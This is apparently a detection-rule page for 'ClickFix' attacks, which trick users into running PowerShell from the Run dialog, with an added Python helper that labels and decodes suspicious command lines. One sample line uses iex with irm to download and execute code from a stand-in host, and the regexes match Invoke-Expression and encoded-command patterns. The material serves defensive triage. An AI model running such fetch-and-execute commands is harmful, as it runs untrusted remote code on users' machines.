Synopsis
Activation Period | 14 Days
Training Period | 30 Days
Test Period | N/A (single event)
Deduplication Period | 1 Day
Required Data |
Detection Modules |
Detector Tags |
ATT&CK Tactic |
ATT&CK Technique |
Severity | Low
Description
An attacker may be trying to trick a user into executing PowerShell through the Run application.
Attacker's Goals
- An attacker may be trying to trick a user into executing PowerShell through the Run application.
Investigative actions
- Check whether the command line is known in the organization or is malicious.
- Ask the user where the command came from.
Variations
ClickFix - PowerShell command executed through the run application and using Invoke-Expression cmdlet
ClickFix - Long PowerShell command executed through the run application with URL in the command
ClickFix - Long encoded PowerShell command executed through the run application
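
To support the command-line check under Investigative actions, the following triage helper maps a PowerShell command line to the three variations above and decodes any -EncodedCommand payload so the analyst can read it. It is an added example, not the detector's own logic; the 200-character threshold for "long", the label names and the sample command lines are assumptions constructed for illustration.

```python
import base64
import re

LONG_CMD_CHARS = 200  # assumption: the page does not say what counts as "long"
IEX_RE = re.compile(r"(?<![\w-])(?:invoke-expression|iex)(?![\w-])", re.I)
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)
# A flag starting with "e" followed by something that looks like base64.
FLAG_RE = re.compile(r"(?<!\S)[-/](e[a-z]*)\s+[\"']?([A-Za-z0-9+/]{8,}={0,2})", re.I)

def encode_ps(script):
    """Encode a script the way -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded(cmdline):
    """Return (decoded_script, blob) for an -EncodedCommand argument, else (None, None)."""
    for m in FLAG_RE.finditer(cmdline):
        flag = m.group(1).lower()
        # powershell.exe accepts -ec and abbreviations of -EncodedCommand (-e, -enc, ...).
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(m.group(2), validate=True).decode("utf-16-le"), m.group(2)
            except ValueError:  # bad base64 or not UTF-16LE: leave for manual review
                return None, None
    return None, None

def triage(cmdline):
    """Map one Run-dialog PowerShell command line to the variations listed above."""
    decoded, blob = decode_encoded(cmdline)
    # Search the decoded script in place of the opaque blob.
    text = cmdline.replace(blob, decoded) if decoded else cmdline
    is_long = len(cmdline) >= LONG_CMD_CHARS
    labels = []
    if IEX_RE.search(text):
        labels.append("invoke-expression")
    if is_long and URL_RE.search(text):
        labels.append("long-with-url")
    if is_long and decoded is not None:
        labels.append("long-encoded")
    return {"labels": labels, "urls": URL_RE.findall(text), "decoded": decoded}

# Constructed sample command lines (not taken from real alerts).
SAMPLES = [
    'powershell -c "iex (irm https://example.invalid/a)"',
    "powershell -NoProfile -Command \"$u='https://example.invalid/verify'; "
    + "# constructed padding " * 10 + '"',
    "powershell -NoProfile -EncodedCommand "
    + encode_ps("Write-Output 'constructed sample'; " * 4),
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(triage(s)["labels"], s[:60])
```

The `urls` and `decoded` fields give the analyst concrete values to compare against known internal tooling and to raise with the user when asking where the command came from.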